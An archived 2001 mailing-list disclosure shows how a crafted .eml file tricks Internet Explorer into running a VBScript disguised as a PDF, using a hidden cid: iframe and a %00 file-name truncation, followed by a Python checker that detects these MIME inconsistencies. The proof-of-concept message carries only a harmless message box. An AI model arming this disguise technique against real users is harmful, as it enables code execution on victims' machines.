From: Jesús López de Aguileta (aguiletaEUNATE.NET)
Date: Mon Apr 02 2001 - 15:11:53 CDT


    Hi,

    Playing with Cuartango's recent exploit
    (http://www.kriptopolis.com/cua/eml.html) I've found that it's possible to trick
    a user into executing a file by making him/her think it's a data file of any kind
    (pdf, mpeg,...).

    This works on both NT and 2000 using IE 5.1 (other platforms/IE versions not
    tested).

    I have already downloaded the MS01-20 patch on the systems tested, but both
    appear to be not vulnerable to Cuartango's exploit (msgbox: "This update does
    not need to be installed on your system"), probably because both have an updated
    Media Player 7 installed.

    I think this is a completely different issue; excuse me if it was previously
    solved/commented on.

    Detail:

    --------8<----cut here-------8<

    From: "Ripped from Juan Carlos Garcia Cuartango"
    Subject: mail
    Date: Thu, 2 Nov 2000 13:27:33 +0100
    MIME-Version: 1.0
    Content-Type: multipart/related;
     type="multipart/alternative";
     boundary="1"
    X-Priority: 3
    X-MSMail-Priority: Normal

    --1
    Content-Type: multipart/alternative;
     boundary="2"

    --2
    Content-Type: text/html;
     charset="iso-8859-1"
    Content-Transfer-Encoding: quoted-printable

    <HTML>
    <HEAD>
    </HEAD>
    <BODY bgColor=3D#ffffff >
    <iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe>
    Done<br>
    </BODY>
    </HTML>

    --2--

    --1
    Content-Type: application/x-shockwave-flash;
     name="hola.vbs"
    Content-Transfer-Encoding: quoted-printable
    Content-ID: <donthurtme.pdf>

    msgbox("Hello")

    --1--

    --------8<--cut here---------8<

    Making a .eml file with the above content and browsing it with IE 5 displays a
    window to download or browse online the "FILE" (not program) "donthurtme.pdf".
    If the user chooses to browse it online, the VBScript code executes.

    Another interesting issue is that, when replacing MIME part 1 with:

    --1
    Content-Type: application/xxxx;
     name="hola.pdf%00.vbs"
    Content-Transfer-Encoding: quoted-printable
    Content-ID: <donthurtme.pdf>

    msgbox("Hello")

    --1--

    IE truncates the name in the popup window, displaying "hola.pdf" instead of
    "hola.pdf%00.vbs", making the user think that the extension of the program is
    different. Notice that in this second case, IE properly asks "Run this
    PROGRAM" or "Save this PROGRAM"; only the extension may confuse the user.

    Regards, and excuse my poor English.

    Jesus Lopez de Aguileta
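The inconsistencies the post relies on (a Content-ID whose extension differs from the part's real name, a script extension declared under an unrelated Content-Type, a `%00` that truncates the displayed name, and a hidden `cid:` iframe pulling the part in) can all be read straight out of the MIME headers. The following checker is an added example written for this archive page, not code from the post; the sample message is constructed to mirror the second variant, and the script-extension list and finding texts are my own choices.

```python
import email
import os
import re
from email import policy

# Constructed sample modelled on the post's second variant; not the original .eml file.
SAMPLE_EML = """\
Subject: mail
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="1"

--1
Content-Type: text/html; charset="iso-8859-1"

<HTML><BODY><iframe src=cid:donthurtme.pdf height=0 width=0></iframe></BODY></HTML>

--1
Content-Type: application/x-shockwave-flash; name="hola.pdf%00.vbs"
Content-ID: <donthurtme.pdf>

msgbox("Hello")

--1--
"""

# Extensions Windows hands to a script host or loader rather than a viewer (assumed list).
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".exe", ".bat", ".cmd", ".scr"}
CID_REF_RE = re.compile(r"""src\s*=\s*["']?cid:([^"'\s>]+)""", re.IGNORECASE)

def _ext(name):
    return os.path.splitext(name.lower())[1]

def inspect_eml(raw):
    """Return human-readable findings for parts whose advertised identity is inconsistent."""
    msg = email.message_from_string(raw, policy=policy.default)
    parts = [p for p in msg.walk() if not p.is_multipart()]
    # First pass: every cid: target that an HTML part loads on its own (e.g. a 0x0 iframe).
    refs = set()
    for p in parts:
        if p.get_content_type() == "text/html":
            refs.update(CID_REF_RE.findall(p.get_content()))
    findings = []
    for part in parts:
        if part.get_content_type() == "text/html":
            continue
        name = part.get_filename() or ""          # Content-Disposition filename or Content-Type name
        cid = (part.get("Content-ID") or "").strip("<> ")
        real_ext, ctype = _ext(name), part.get_content_type()
        shown = name.split("%00")[0]              # what a prompt that stops at the null would show
        if "%00" in name or "\x00" in name:
            findings.append(f"{cid or name}: null in name, shown as {shown!r} but real extension is {real_ext}")
        if cid and _ext(cid) and _ext(cid) != real_ext:
            findings.append(f"{cid}: Content-ID extension {_ext(cid)} differs from part name {name!r}")
        if real_ext in SCRIPT_EXTS and not ctype.startswith("text/"):
            findings.append(f"{cid or name}: script extension {real_ext} declared as {ctype}")
        if cid in refs:
            findings.append(f"{cid}: pulled in by an HTML cid: reference, no attachment click needed")
    return findings

if __name__ == "__main__":
    for line in inspect_eml(SAMPLE_EML):
        print(line)
```

Running it on a benign single-part text message returns no findings, so the checks can sit in a mail-gateway pipeline without flagging ordinary traffic.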